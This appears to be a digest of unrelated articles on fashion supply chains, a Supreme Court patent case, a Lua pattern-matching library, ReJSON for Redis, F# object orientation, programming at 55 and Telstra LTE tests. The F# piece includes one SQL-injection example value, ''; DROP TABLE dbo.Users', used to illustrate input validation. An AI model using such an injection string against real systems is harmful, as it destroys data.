Most Inditex garments are made close to its Spanish headquarters or in nearby countries such as Portugal, Morocco and Turkey.

This is what helps the firm achieve its famously fast reaction times to new trends.

Most of its rivals' supply chains are far less local.

Regardless of where they're based, most factories are not owned by the fashion brands that use them. Instead, they're selected as official suppliers. Often these suppliers subcontract work to other factories for certain tasks, or in order to meet tight deadlines.

Image copyright Getty Images
Image caption Your cotton top may well have started out in a field in Texas before criss-crossing the globe

This system can make tracking the specific origins of a single item difficult. I contacted several big clothing brands including H&M, Marks and Spencer, Gap and Arcadia Group last week to give me a sample example of the journey of a t-shirt in their basic range from seed to finished product.

Only Inditex was able to respond in time to meet the deadline for this article.

"I imagine companies don't want to respond because they have no clue where the materials they buy come from," says Tim Hunt, a researcher at Ethical Consumer, which researches the social, ethical and environmental behaviour of firms.

The difficulties were highlighted devastatingly by the 2013 Rana Plaza disaster where more than 1,100 people were killed and 2,500 injured when the Bangladesh garment factory collapsed.

In some cases, brands weren't even aware their clothes were being produced there.

Image copyright Fashion revolution
Image caption The #whomademyclothes campaign encourages customers to put pressure on fashion firms to be more open about their suppliers

According to the "Behind the Barcode" report by Christian Aid and development organisation Baptist World Aid Australia, only 16% of the 87 biggest fashion brands publish a full list of the factories where their clothes are sewn, and less than a fifth of brands know where all of their zips, buttons, thread and fabric come from.

Non-profit group Fashion Revolution, formed after the Rana Plaza factory collapse, is leading a campaign to try to force firms to be more transparent about their supply chains.

Every year, around the time of the disaster it runs a #whomademyclothes campaign encouraging customers to push firms on this issue.

Fashion Revolution co-founder and creative director Orsola de Castro says the mass production demands of the fashion industry and the tight timescales required to get products from the catwalks on to the shelves as quickly as possible means the manufacturing processes have become "very, very chaotic".

"The amount of manpower which goes into the production of a t-shirt - even at the sewing level, it goes through so many different hands. On their standard products most brands wouldn't know the journey from seed to store," she says.

While newer and smaller fashion brands are creating products with 100% traceability, she says it's a lot harder for the established giants.

"It's a big and complex issue to turn around and would require a massive shift in attitude."

Image copyright Getty Images
Image caption Pietra Rivoli travelled from the US to China and Africa to track the journey of a single $6 t-shirt

Yet just over a decade ago, Pietra Rivoli had no problems tracking the journey of a single $6 cotton t-shirt she'd picked out of a sale bin in a Walmart in Florida.

Starting with the tag at the back of the t-shirt, she tracked its journey backwards from the US "step by step along the supply chain".

"A shoe leather project," is how Prof Rivoli describes her journey, which resulted in a book, The Travels of a T-Shirt in the Global Economy.

As a teacher of finance and international business at Georgetown University in Washington, Prof Rivoli wanted to investigate her assumption that free trade benefited all countries.

Image copyright Pietra Rivoli
Image caption Pietra Rivoli says the current backlash against global trade is linked to political interference

Her travels took her from the cotton-growing region of Lubbock in Texas to China, where the t-shirt was sewn together. Eventually, she ended up in Tanzania on the east coast of Africa, which has a thriving second-hand clothing market.

Her assumption was that the complicated supply chain was driven by cost and market forces.

She concluded that a lot of brands' decisions about where to buy supplies and make their clothing was actually driven by politics. She cites US agricultural subsidies for cotton growers and China's migration policies encouraging workers to move from the countryside as examples.

"Rather than a story of how people were competing - how do I make a faster T-shirt, a better T-shirt, a cheaper T-shirt - what I found is that the story of the T-shirt and why its life turned out the way it did was really about how people were using political power," she says.

The current backlash against global trade is a direct result of this kind of political interference, she believes.

This kind of consumer anger could eventually drive change among fashion firms, she says. Prof Rivoli notes that many firms now list all their direct suppliers and she says there is a move towards developing fewer, longer term supplier relationships.

"There might be a little less hopping around," she laughs.

Close this section

The US Supreme Court is hearing a case about patent law’s “exhaustion doctrine”

Today, the Supreme Court heard arguments in a case that could allow companies to keep a dead hand of control over their products, even after you buy them.  The case, Impression Products v. Lexmark International, is on appeal from the Court of Appeals for the Federal Circuit, who last year affirmed its own precedent allowing patent holders to restrict how consumers can use the products they buy. That decision, and the precedent it relied on, departs from long established legal rules that safeguard consumers and enable innovation.

When you buy something physical—a toaster, a book, or a printer, for example—you expect to be free to use it as you see fit: to adapt it to suit your needs, fix it when it breaks, re-use it, lend it, sell it, or give it away when you’re done with it. Your freedom to do those things is a necessary aspect of your ownership of those objects. If you can’t do them, because the seller or manufacturer has imposed restrictions or limitations on your use of the product, then you don’t really own them. Traditionally, the law safeguards these freedoms by discouraging sellers from imposing certain conditions or restrictions on the sale of goods and property, and limiting the circumstances in which those restrictions may be imposed by contract.

But some companies are relentless in their quest to circumvent and undermine these protections. They want to control what end users of their products can do with the stuff they ostensibly own, by attaching restrictions and conditions on purchasers, locking down their products, and locking you (along with competitors and researchers) out. If they can do that through patent law, rather than ordinary contract, it would mean they could evade legal limits on contracts, and that any one using a product in violation of those restrictions (whether a consumer or competitor) could face harsh penalties for patent infringement.

Impression Products v. Lexmark International is Lexmark’s latest attempt to prevent purchasers from reusing and refilling its ink cartridges with cheaper ink. If Lexmark can use patent law to accomplish this, it won’t just affect the person or company that buys the cartridge, but also anyone who later acquires or refills it, even if they never agreed to what Lexmark wanted.

The case will turn on how the Supreme Court applies patent law’s “exhaustion doctrine.” As the Court explained in its unanimous Quanta v. LG Electronics decision, the exhaustion doctrine provides that “the initial authorized sale of a patented item terminates all patent rights.” Meaning, a patent holder can’t use patent rights to control what you can do with the product you’ve purchased, because they no longer have patent rights in that particular object. As we explained in a brief submitted along with Public Knowledge, Mozilla, the AARP, and R Street Institute to the Supreme Court, the doctrine protects both purchasers and downstream users of patented products. Without the exhaustion doctrine, patent holders would be free to impose all kinds of limits on what you can do with their products, and can use patent infringement’s severe penalties as the enforcement mechanism. The doctrine also serves patent law’s constitutional purpose—to promote progress and innovation—by ensuring that future innovators have access to, and can research and build on, existing inventions, without seeking permission from the patent holder.

This isn’t Lexmark’s first bite at the apple. The company first tried to argue that copyright law, and section 1201 of the DMCA (which prohibits circumvention of DRM), gave it the right to prevent re-use of its toner cartridges. In 2004, the Sixth Circuit roundly rejected Lexmark’s copyright claims. The court explained that even if Lexmark could claim copyright in the code at issue, and while it might want to protect its market share in cartridges, “that is not the sort of market value that copyright protects.” The Sixth Circuit also shot down Lexmark’s section 1201 claims, stating

[n]owhere in its deliberations over the DMCA did Congress express an interest in creating liability for the circumvention of technological measures designed to prevent consumers from using consumer goods while leaving copyrightable content of a work unprotected. In fact, Congress added the interoperability provision in part to ensure that the DMCA would not diminish the benefit to consumers of interoperable devices "in the consumer electronics environment."

Having lost on its copyright claims, Lexmark found a warmer welcome at the Federal Circuit, who last year held that so long as the company “restricted” the sale of its product (in this case through a notice placed on the side of the cartridge) Lexmark could get around patent exhaustion, and retain the right to control downstream users’ behavior under patent law.

The Federal Circuit’s ruling in Lexmark seriously undermines the exhaustion doctrine, allowing patent holders to control users’ behavior long after the point of purchase merely by including some form of notice of the restriction at the point of sale. As we’ve said before, this is especially troubling because downstream users and purchasers may be entirely unaware of the patent owner’s restrictions.

The Federal Circuit’s the ruling is also significantly out of step with how the majority of the law treats these kinds of restrictions. While sellers can use contract law to bind an original purchaser to mutually agreed-upon terms (with some limits) for hundreds of years, courts have disfavored sellers’ attempts to use other laws to control goods after a transfer of ownership. Courts and legal scholars have long acknowledged that such restrictions impair the purchasers’ personal autonomy, interfere with efficient use of property, create confusion in markets, and increase information costs. The Federal Circuit’s ruling is even out of step with copyright law, whose exhaustion principle is codified in the first sale doctrine.

We’re hopeful that the Supreme Court will reverse the Federal Circuit and bring patent law’s exhaustion doctrine back in line.

Close this section

Tamale: An Erlang-Style Pattern-Matching Library for Lua

Overview

Tamale is a Lua library for structural pattern matching - kind of like regular expressions for arbitrary data structures, not just strings. (Or Sinatra for data structures, rather than URLs.)

tamale.matcher reads a rule table and produces a matcher function. The table should list {pattern, result} rules, which are structurally compared in order against the input. The matcher returns the result for the first successful rule, or (nil, "Match failed") if none match.

Basic Usage

require "tamale"
local V = tamale.var
local M = tamale.matcher {
   { {"foo", 1, {} },      "one" },
   { 10,                   function() return "two" end},
   { {"bar", 10, 100},     "three" },
   { {"baz", V"X" },       V"X" },    -- V"X" is a variable
   { {"add", V"X", V"Y"},  function(cs) return cs.X + cs.Y end },
}

print(M({"foo", 1, {}}))   --> "one"
print(M(10))               --> "two"
print(M({"bar", 10, 100})) --> "three"
print(M({"baz", "four"}))  --> "four"
print(M({"add", 2, 3})     --> 5
print(M({"sub", 2, 3})     --> nil, "Match failed"

The result can be either a literal value (number, string, etc.), a variable, a table, or a function. Functions are called with a table containing the original input and captures (if any); its result is returned. Variables in the result (standalone or in tables) are replaced with their captures.

Benefits of Pattern Matching

  • Declarative (AKA "data-driven") programming is easy to locally reason about, maintain, and debug.
  • Structures do not need to be manually unpacked - pattern variables automatically capture the value from their position in the input.
  • "It fits or it doesn't fit" - the contract that code is expected to follow is very clear.
  • Rule tables can be compiled down to search trees, which are potentially more efficient than long, nested if / switch statements. (Tamale currently does not do this, but could in the future without any change to its interface. Also, see Indexing below.)

Imperative code to rebalance red-black trees can get pretty hairy. With pattern matching, the list of transformations is the code.

-- create red & black tags and local pattern variables
local R,B,a,x,b,y,c,z,d = "R", "B", V"a", V"x", V"b", V"y", V"c", V"z", V"d"
local balanced = { R, { B, a, x, b }, y, { B, c, z, d } }
                                                                                                                                 
balance = tamale.matcher {
   { {B, {R, {R, a, x, b}, y, c}, z, d},  balanced },
   { {B, {R, a, x, {R, b, y, c,}}, z, d}, balanced },
   { {B, a, x, {R, {R, b, y, c,}, z, d}}, balanced },
   { {B, a, x, {R, b, y, {R, c, z, d}}},  balanced },
   { V"body", V"body" },      -- default case, keep the same
}

(Adapted from Chris Okasaki's Purely Functional Data Structures.)

The style of pattern matching used in Tamale is closest to Erlang's. Since pattern-matching comes from declarative languages, it may help to study them directly.

Particularly recommended:

  • The Art of Prolog by Leon Sterling & Ehud Shapiro
  • Programming Erlang by Joe Armstrong

Rules

Each rule has the form { *pattern*, *result*, [when=function] }.

The pattern can be a literal value, table, or function. For tables, every field is checked against every field in the input (and those fields may in turn contain literals, variables, tables, or functions).

Functions are called on the input's corresponding field. If the function's first result is non-false, the field is considered a match, and all results are appended to the capture table. (See below) If the function returns false or nil, the match was a failure.

tamale.P marks strings as patterns that should be compared with string.match (possibly returning captures), rather than as a string literal. Use it like { P"aaa(.*)bbb", result}.

Its entire implementation is just

function P(str)
    return function(v)
        if type(v) == "string" then return string.match(v, str) end
    end
end

Rules also have two optional keyword arguments:

Extra Restrictions - when=function(captures)

This is used to add further restrictions to a rule, such as a rule that can only take strings which are also valid e-mail addresses. (The function is passed the captures table.)

-- is_valid(cs) checks cs[1] 
{ P"(.*)", register_address, when=is_valid }

Partial patterns - partial=true

This flag allows a table pattern to match an table input value which has more fields that are listed in the pattern.

{ {tag="leaf"}, some_fun, partial=true }

could match against any table that has the value t.tag == "leaf", regardless of any other fields.

Variables and Captures

The patterns specified in Tamale rules can have variables, which capture the contents of that position in the input. To create a Tamale variable, use tamale.var('x') (which can potentially aliased as V'x', if you're into the whole brevity thing).

Variable names can be any string, though any beginning with _ are ignored during matching (i.e., {V"_", V"_", V"X", V"_" } will capture the third value from any four-value array). Variable names are not required to be uppercase, it's just a convention from Prolog and Erlang.

Also, note that declaring local variables for frequently used Tamale variables can make rule tables cleaner. Compare

local X, Y, Z = V"X", V"Y", V"Z"
M = tamale.matcher {
   { {X, X},    1},   -- capitalization helps to keep
   { {X, Y},    2},   -- the Tamale vars distinct from
   { {X, Y, Z}, 3},   -- the Lua vars
}

with

M = tamale.matcher {
   { {V'X', V'X'},       1},
   { {V'X', V'Y'},       2},
   { {V'X', V'Y', V'Z'}, 3},
}

The _ example above could be reduced to {_, _, X, _}.

Finally, when the same variable appears in multiple fields in a rule pattern, such as { X, Y, X }, each repeated field must structurally match its other occurrances. {X, Y, X} would match {6, 1, 6}, but not {5, 1, 7}.

The Rule Table

The function tamale.matcher takes a rule table and returns a matcher function. The matcher function takes one or more arguments; the first is matched against the rule table, and any further arguments are saved in captures.args.

The rule table also takes a couple other options, which are described below.

Identifiers - ids={List, Of, IDs}

Tamale defaults to structural comparison of tables, but sometimes tables are used as identifiers, e.g. SENTINEL = {}. The rule table can have an optional argument of ids={LIST, OF, IDS}, for values that should still be compared by == rather than structure. (Otherwise, all such IDs would match each other, and any empty table.)

Indexing - index=field

Indexing in Tamale is like indexing in relational databases - Rather than testing every single rule to find a match, only those in the index need to be tested. Often, this singlehandedly eliminates most of the rules. By default, the rules are indexed by the first value.

When the rule table

tamale.matcher {
    { {1, "a"}, 1 },
    { {1, "b"}, 2 },
    { {1, "c"}, 3 },
    { {2, "d"}, 4 },
}

is matched against {2, "d"}, it only needs one test if the rule table is indexed by the first field - the fourth rule is the only one starting with 2. To specify a different index than pattern[1], give the rule table a keyword argument of index=I, where I is either another key (such as 2 or "tag"), or a function. If a function is used, each rule will be indexed by the result of applying the function to it.

For example, with the rule table

tamale.matcher {
   { {"a", "b", 1}, 1 },   -- index "ab"
   { {"a", "c", 1}, 2 },   -- index "ac"
   { {"b", "a", 1}, 3 },   -- index "ba"
   { {"b", "c", 1}, 4 },   -- index "bc"
   index=function(rule) return rule[1] .. rule[2] end
}

each rule will be indexed based on the first two fields concatenated, rather than just the first. An input value of {"a", "c", 1} would only need to check the second row, not the first.

Indexing should never change the results of pattern matching, just make the matcher function do less searching. Note that an indexing function needs to be deterministic - indexing by (say) os.time() will produce weird results. An argument of index=false turns indexing off.

Debugging - debug=true

Tamale has several debugging traces. They can be enabled either by spetting tamale.DEBUG to true, or adding debug=true as a keyword argument to a rule table.

Matching { "a", "c", 1 } against

tamale.matcher {
   { {"a", "b", 1}, 1 },
   { {"a", "c", 1}, 2 },
   { {"b", "a", 1}, 3 },
   { {"b", "c", 1}, 4 },
   index=function(rule) return rule[1] .. rule[2] end,
   debug = true
}

will print

* rule 1: indexing on index(t)=ab
* rule 2: indexing on index(t)=ac
* rule 3: indexing on index(t)=ba
* rule 4: indexing on index(t)=bc
-- Checking rules: 2
-- Trying rule 2...matched
2

This can be used to check whether indexing is effective, if one rule is pre-empting another, etc.

Close this section

Redis as a JSON store

tl;dr a Redis module that provides native JSON capabilities – get it from the GitHub repository or read the docs online.

Both JSON and Redis need no introduction; the former is the standard data interchange format between modern applications, whereas the latter is ubiquitous wherever performant data management is needed by them. That being the case, I was shocked when a couple of years ago I learned that the two don’t get along.

Redis isn’t a one-trick pony–it is, in fact, quite the opposite. Unlike general purpose one-size-fits-all databases, Redis (a.k.a the “Swiss Army Knife of Databases”, “Super Glue of Microservices” and “Execution context of Functions-as-a-Service”) provides specialized tools for specific tasks. Developers use these tools, which are exposed as abstract data structures and their accompanying operations, to model optimal solutions for problems. And that is exactly the reason why using Redis for managing JSON data is unnatural.

Fact: despite its multitude of core data structures, Redis has none that fit the requirements of a JSON value. Sure, you can work around that by using other data types: Strings are great for storing raw serialized JSON, and you can represent flat JSON objects with Hashes. But these workaround patterns impose limitations that make them useful only in a handful of use cases, and even then the experience leaves an un-Redis-ish aftertaste. Their awkwardness clashes sharply with the simplicity and elegance of using Redis normally.

But all that changed during the last year after Salvatore Sanfilippo’s @antirez visit to the Tel Aviv office, and with Redis modules becoming a reality. Suddenly the sky wasn’t the limit anymore. Now that modules let anyone do anything, it turned out that I could be that particular anyone. Picking up on C development after more than a two decades hiatus proved to be less of a nightmare than I had anticipated, and with Dvir Volk’s @dvirsky loving guidance we birthed ReJSON.

While you may not be thrilled about its name (I know that I’m not – suggestions are welcome), ReJSON itself should make any Redis user giddy with JSON joy. The module provides a new data type that is tailored for fast and efficient manipulation of JSON documents. Like any Redis data type, ReJSON’s values are stored in keys that can be accessed with a specialized subset of commands. These commands, or the API that the module exposes, are designed to be intuitive to users coming to Redis from the JSON world and vice versa. Consider this example that shows how to set and get values:

127.0.0.1:6379> JSON.SET scalar . '"Hello JSON!"'
OK
127.0.0.1:6379> JSON.SET object . '{"foo": "bar", "ans": 42}'
OK
127.0.0.1:6379> JSON.GET object
"{\"foo\":\"bar",\"ans\":42}"
127.0.0.1:6379> JSON.GET object .ans
"42"
127.0.0.1:6379> ^C
~$ 

 

Like any well-behaved module, ReJSON’s commands come prefixed. Both JSON.SET and JSON.GET expect the key’s name as their first argument. In the first line we set the root (denoted by a period character: “.”) of the key named scalar to a string value. Next, a different key named object is set with a JSON object (which is first read whole) and then a single sub-element by path.

What happens under the hood is that whenever you call JSON.SET, the module takes the value through a streaming lexer that parses the input JSON and builds tree data structure from it:

ReJSON stores the data in binary format in the tree’s nodes, and supports a subset of JSONPath for easy referencing of subelements. It boasts an arsenal of atomic commands that are tailored for every JSON value type, including: JSON.STRAPPEND for appending strings; JSON.NUMMULTBY for multiplying numbers; and JSON.ARRTRIM for trimming arrays… and making pirates happy.

Because ReJSON is implemented as a Redis module, you can use it with any Redis client that: a) supports modules (ATM none) or b) allows sending raw commands (ATM most). For example, you can use a ReJSON-enabled Redis server from your Python code with redis-py like so:

import redis
import json

data = {
    'foo': 'bar',
    'ans': 42
}

r = redis.StrictRedis()
r.execute_command('JSON.SET', 'object', '.', json.dumps(data))
reply = json.loads(r.execute_command('JSON.GET', 'object'))

 

But that’s just half of it. ReJSON isn’t only a pretty API – it also a powerhouse in terms of performance. Initial performance benchmarks already demonstrate that, for example:

The above graphs compare the rate (operations/sec) and average latency of read and write operations performed on a 3.4KB JSON payload that has three nested levels. ReJSON is pitted against two variants that store the data in Strings. Both variants are implemented as Redis server-side Lua scripts with the json.lua variant storing the raw serialized JSON, and msgpack.lua using MessagePack encoding.

If you have 21 minutes to spare, here’s the ReJSON presentation from Redis Day TLV:

You can start playing with ReJSON today! Get it from the GitHub repository or read the docs online. There are still many features that we want to add to it, but it’s pretty neat as it is. If you have feature requests or have spotted an issue, feel free to use the repo’s issue tracker. You can always email or tweet at me – I’m highly-available 🙂

Close this section

Why OO Matters in F#

F# is a functional-first programming language that comes with a substantial object-oriented feature set. It is so feature-complete in fact, that almost any C# class can be ported over to F# code with little substantial alteration.

However significant, this subset of the language is seeing limited appreciation from the community, which I suspect is partly fuelled by the known criticisms of OOP and partly by a desire to be different than C#. After all, this is a functional-first language so we can just replace all our classes with functions. There is also the opinion that OOP in F# merely serves as a compatibility layer for .NET, so it’s really only there to cover those unfortunate scenarios of having to use a library that accepts interfaces.

Enabling Abstraction

One of the most important aspects of maintaining a nontrivial codebase is controlling complexity. Complexity can be contained by partitioning code into logically standalone components whose implementation details are hidden behind appropriately designed abstractions. In his excellent Solid and Functional article, Vesa Karvonen argues that selecting the correct abstraction is a hard problem, and that functional programming is no silver bullet in dealing with that. This resonates a lot with me, and I strongly encourage everyone to read the full article.

That said, Vesa is framing the article in Standard ML which supports a full-blown module system. Modules can be abstracted using signatures or they can be parameterized by other modules using functors. Modules are the predominant means of abstraction in the ML ecosystem. In Haskell, it is type classes and higher-kinded types. In F#, modules are intentionally stripped of any complicated features, effectively functioning as a mere namespacing construct.

My claim is that there are inherent limits to what can be expressed using just F# modules and functions, in terms of enabling good abstraction. Luckily, we can always make use of the next best thing, which is F# OO. The thesis of this article is that strategically admitting elements of OO in an F# codebase significantly improves quality and maintainability. While I cannot conclusively prove this within the confines of a single blog post, I will try to provide hints as to why this is.

Classes as Value Parametric Modules

It is often the case that an API exposed through a module must be context aware. Typically F# developers address this by adding extra parameters in every function:

module MyApi =
    let function1 dep1 dep2 dep3 arg1 = doStuffWith dep1 dep2 dep3 arg1
    let function2 dep1 dep2 dep3 arg2 = doStuffWith' dep1 dep2 dep3 arg2

While this does work well in simple cases, it does not scale nicely as dependencies increase. It would typically prompt the developer to group arguments in context records:

type MyApiContext = { Dep1 : Dep1 ; Dep2 : Dep2 ; Dep3 : Dep3 }

module MyApi =
    let function1 (ctx : MyApiContext) arg1 = doStuffWith ctx.Dep1 ctx.Dep2 ctx.Dep3 arg1
    let function2 (ctx : MyApiContext) arg2 = doStuffWith' ctx.Dep1 ctx.Dep2 ctx.Dep3 arg2

This complicates the implementation even more both in the definition site and in the consumption site. In practice, you either end up with one context type per component or one God context for the entire application. Even more importantly, this approach often violates encapsulation concerns, pushing the burden of gathering dependencies to the consumers of the API, every single time they do consume the API. Partial application also does little to address any of these concerns in nontrivial contexts.

Less experienced developers might be prompted to do something even worse: lift dependencies to module values.

module MyApi =
    let dep1 = File.ReadAllText "/Users/eirik/connectionstring.txt"
    let dep2 = Environment.GetEnvironmentVariable "DEP_2"
    let dep3 = Random().Next()

    let function1 arg = doStuffWith dep1 dep2 dep3 arg
    let function2 arg = doSutffWith dep1 dep2 dep3 arg

This is bad for many reasons: it makes the API reliant on global state, introduces unneeded side-effects, and pushes app configuration concerns deep inside the guts of our codebase. What’s more, module value initialization compiles to a static constructor for the entire compilation unit so the exact moment of execution is largely unpredictable. Initialization errors manifest as TypeInitializationExceptions which are difficult to debug.

Contrast the situation above with the elegance afforded by a plain old class:

type MyParametricApi(dep1, dep2, dep3) =
    member __.Function1 arg1 = doStuffWith dep1 dep2 dep3 arg1
    member __.Function2 arg2 = doStuffWith' dep1 dep2 dep3 arg2

An API object could be created once at application initialization, or as many times required depending on context. It’s also more amenable to testing. I should add that this approach is essentially just as “functional” as the approaches above, since it’s merely composing dependencies to expose a context-sensitive API. Importantly, it achieves this in a much simpler way both in the definition site and consumption site, which pays great dividends if realized in big codebases.

Expressive APIs

An important attribute of method-based APIs is that they allow for greater expressive power, in two important ways:

  1. Named/Optional parameters: unlike OCaml, whose functions support out-of-order named argument passing and omitted optional arguments, F# functions support neither. Luckily, we can do this using F# methods. I find this to be an immensely powerful tool when exposing non-trivially parameterizable functionality. A function that explicitly accepts 10 optional parameters is not acceptable; a method that accepts 10 optional arguments works like a charm.
  2. Method overloading: because function names like connect' and bind2 are simply not good enough when exposed in a public API.

More Powerful Types

The type system afforded by .NET is strictly more powerful than what can be expressed using modules and functions. For example, the interface

type Scheduler =
    abstract Run<'T> : Async<'T> -> 'T

encodes a kind of function that cannot be expressed in terms of proper F# lambdas. When combined with subtyping, it is possible to effectively encode existential types and Rank-N polymorphism. Even GADTs are possible, with minimal augmentations of the type system.

In practice, it is possible to leverage that additional power very effectively. In fact, F# makes it easy to define generic function literals using object expressions. This is also how the TypeShape library has been made possible.

Abstracting Modules

Functions are the unit of abstraction in F#, but that unit is often insufficient when abstracting APIs. This prompts developers to adopt an approach where abstract APIs are surfaced as either records or tuples of functions:

type Serializer =
    {
        Serialize : bool -> obj -> string
        Deserialize : bool -> string -> obj
    }

According to the F# design guidelines, use of records for building APIs is discouraged and recommends using regular interfaces instead.

I strongly agree with this recommendation for a multitude of reasons: interfaces are more powerful since they support generic methods, named arguments and optional arguments. An interface is less likely to be defined in terms of closures, making it easier to reason about when viewing from a debugger.

So the example above could be rendered as an interface like so:

type Serializer =
    abstract Serialize<'T> : preserveRefEq:bool -> value:'T -> string
    abstract Deserialize<'T> : preserveRefEq:bool -> pickle:string -> 'T

The most important aspect of this approach is readability. It is easier for a consumer of this interface to anticipate what the purpose of each argument is, in the same way that it is easier to understand a record of functions over a tuple of functions.

Representing Illegal State

A lot of proverbial ink has been spent describing how we should strive to make illegal states unrepresentable. However, I do fail to see how this could be fully realized given that the functional core of F# only consists of algebraic data types. Take for example an oft-quoted email type:

type Email = Email of string

The following values are valid instaces of type Email:

Email null
Email "John Smith"
Email "eirik@foo.bar'; DROP TABLE dbo.Users"

If we truly care about illegal states, the obvious alteration to the type above ought to be the following

type Email = private | Email of string
with
    member this.Address = let (Email addr) = this in addr
    static member TryParse(address : string) =
        if isValidEmail address then Some(Email address)
        else None

But really, this is a just a class encoded by a union. The implementation below is simpler:

type Email private (address : string) =
    member __.Address = address
    static member TryParse(address : string) =
        if isValidEmail address then Some(Email address)
        else None

NB the previous implementation might in fact be warranted in cases where free structural equality or comparison are needed. But for all intents and purposes, both approaches effectively subscribe to OO-style encapsulation.

OO And Purity

The relationship between OO and purity can be a frequent avenue for misconception. Occasionally someone will claim that by admitting objects we are ipso facto forsaking purity. On the contrary, I do claim that these really are orthogonal concerns. Just as a lambda is capable of producing side-effects, objects can be designed for purity. Good examples of this are Map and Set in the core library. The lambda is really just an abstract class with a single virtual method and lots of syntactic sugar. There is nothing fundamentally setting it apart from objects once you exclude the syntactic aspect.

Conclusions

So, is this a call to go full-blown OO in F# projects? Should we be digging up our old GoF copies? Are design patterns up there in the functional curriculum together with profunctor optics? Are inheritance and class hierarchies sexy again? No!

I am in fact proposing that there is a third way, where functional and OO components coexist, with one paradigm complementing the other. This is hardly a new idea. Quoting from the F# design guidelines:

F# is commonly called a functional-first language: object, functional and imperative paradigms are all well supported, but functional programming tends to be the first technique used. Many of the defaults of F# are set up to encourage functional programming, but programming in the other paradigms is effective and efficient, and a combination is often best of all. It is a common misconception that the functional and object programming methodologies are competing. In fact, they are generally orthogonal and largely complementary. Often, functional programming plays a stronger role “in the small” (e.g. at the implementation level of functions/method and the code contained therein) and object programming playe a bigger role “in the large” (e.g. at the structural level of classes, interfaces, and namespaces, and the organization of APIs for frameworks).

In my 6 years of working with F#, my style has gradually shifted towards embracing this approach. A few examples:

  • I typically write the implementation of a large component in the functional style behind a private module, then expose its public API as part of a standalone class. I find that method-based APIs are friendlier to consumers unfamiliar with the implementation.
  • I use records and unions for encoding internal representations and classes for encapsulating publicly visible instances. A very good example of this is the F# map implementation.
  • I rarely expose records and unions as part of a public API unless it is abundantly evident that all possible instances for the given types are valid in their context of use. This does not happen often in my experience.
  • If a module is exposed as part of a public API, care must be taken so that the number of arguments is small and behaviour can be predicted by reading the type signature of the function alone. The core List and Array modules are a good example. Avoid using modules to expose complex functionality like the Async API.

I remember reading a few years back Simon Cousins’ NOOO manifesto, which stands for Not Only Object-Oriented development. In retrospect I find this to be an excellent name for a manifesto, if only because “Not Only OO” is not the same thing as “No OO”. So here’s a proposal to revive that manifesto, perhaps with the understanding that “Not Only OO” also implies “Not Only FP” in the context of F#.

Close this section

Yes I Still Want to Be Doing This at 56 (2012)

Yes I Still Want To Be Doing This at 56

Oct 4, 2012

Do You Really Want To Be Doing This at 50?

"But large scale, high stress coding? I may have to admit that's a young man's game."

No, it's a stupid person's game (sure it's mostly men, but not 100%). I'm 55 and have been coding professionally since 1981 and started in school in 1973 or so. One thing I've learned for sure is that coding yourself to death is not worth it in the end.

My recent post Why I Don't Do Unpaid Overtime and Neither Should You remains my most popular post every week since it appeared. Seems I am not the only one who has figured out that deathcoding is a waste of life. I won't repeat what I said there.

To the question of still doing this at 55, in my case, the answer is yes. I still enjoy the challenges, managing complex problems and finding good solutions. Every morning I read a number of websites devoted to technology and programming to see what is new. I figure the day I don't care about new things is the day I give up being a programmer. My morning ritual has not changed since I started my first programming job, except in those days it was magazines, catalogs and books plus the occasional conference.

I remember a job I had at that first company (General Dynamics) where I was trained to support the new IBM PC's we were getting. This wasn't my only task but it was something new so no one knew what might be needed so I read everything I could get my hands on including the entire body of IBM's product literature. Soon the IBM reps were coming to me to find out how to configure and combine various products together. I didn't have to learn all this stuff but it seemed a useful body of knowledge. Today I still learn stuff because it is interesting even if the need seems unlikely.

If you aren't curious about the world of programming and other related technology areas then your programming career isn't going to last. Most of the people I knew who got Computer Science degrees when I was in college no longer program anything; they lost interest, or stopped learning and eventually got run over by the new technology steamroller. My degree (and a half) was in Chemistry of all things.

Through the years I've morphed so many times I may as well be in a Wolfman movie (which was my nickname in high school).

The thing I find most important today is that you should never work longer, just smarter. Being older does mean you can't code 20 hours a day anymore, or rather imagine you can code 20 hours a day as it's not really good coding. Is there a real limit to how many hours a day you can actually be producing a quality application? Probably it does go down over time but as long as you continue to learn how to code smarter the end result is still quality, just with less caffeine.

The biggest difference between today and when I started is the sheer variety of choices of languages, tools, platforms, methodologies and in general options that one can choose from (or have chosen for you). It's impossible for anyone to know everything anymore, even about a narrow area like I was able to do with my IBM PC knowledge. What matters more is the ability to choose wisely among the many options. One of my favorite movie lines is from Indiana Jones and the Holy Grail, where the bad guy melts down and the old knight says "He chose poorly". So much glittery stuff to pick from but only some is actually usable.

Having experience sometimes gives you the upper hand in knowing when to go and when to slow. Then again being young lets you look at something new and not worry about failure. There is benefit to both points of view, I think of the young Steve Jobs who had all the right ideas but couldn't make them work and the older Steve Jobs who could take the ideas and make them amazing. The point is not that either age is by itself a benefit but that you keep some of the curiosity and vision of youth and combine it with experience and a longer viewpoint when being older so you never become obsolete.

If you want to be a programmer at 55 still you can't ever lose the hunger to know more, know better and know simpler. Once you lose that edge the technology steamroller keeps on coming closer and closer until you wind up flat doing something else for a living.

I never considered when I was 24 and in my first professional programming job what being 55 was going to be like, but I already knew what I had to do to keep relevant and always a step ahead.

Will programming still exist in 31 more years? A good question. Will I still be programming at 86? Probably not but if it's still possible and I still care, maybe. By then I should be so smart I can do a whole day's work in 30 minutes.

Either that or I will tell my robot friend to do it for me and get back to my nap!

Close this section

Telstra’s Gigabit Class LTE Network

We just came back from Sydney, Australia where we had the opportunity to experience the world’s first Gigabit Class LTE network operated by Telstra, using the world’s first commercially available Gigabit Class LTE device, Netgear® Nighthawk M1 powered by Qualcomm Snapdragon™ X16 LTE modem. As we are still in the process of analyzing the collected data, this brief overview should offer our initial impressions.

The vast majority of outdoor tests were conducted on March 14th & 15th and included visits to iconic locations throughout Sydney’s Central Business District (CBD). On March 16th stormy weather limited our mobility and kept us in the hotel, but we used that time to experience Nighthawk M1’s 4-way receive antenna design performance in cell edge environment.

Our goal was to quantify the performance delta of a Category (Cat) 16 device (Nighthawk M1) against a Cat 6 device (Telstra Signature Premium by HTC) in a Gigabit Class LTE network, by performing everyday tasks such as downloading and uploading (large) files to Google Drive, streaming YouTube 4K videos, and using a popular Ookla SpeedTest. For maximum performance, our preferred testing method involved a laptop tethered via USB, which means most of our testing has been done stationary. Additionally, we performed a healthy amount of low mobility testing using smartphones wirelessly tethered to the M1. Over three days of testing we have burned through 180GB of data.

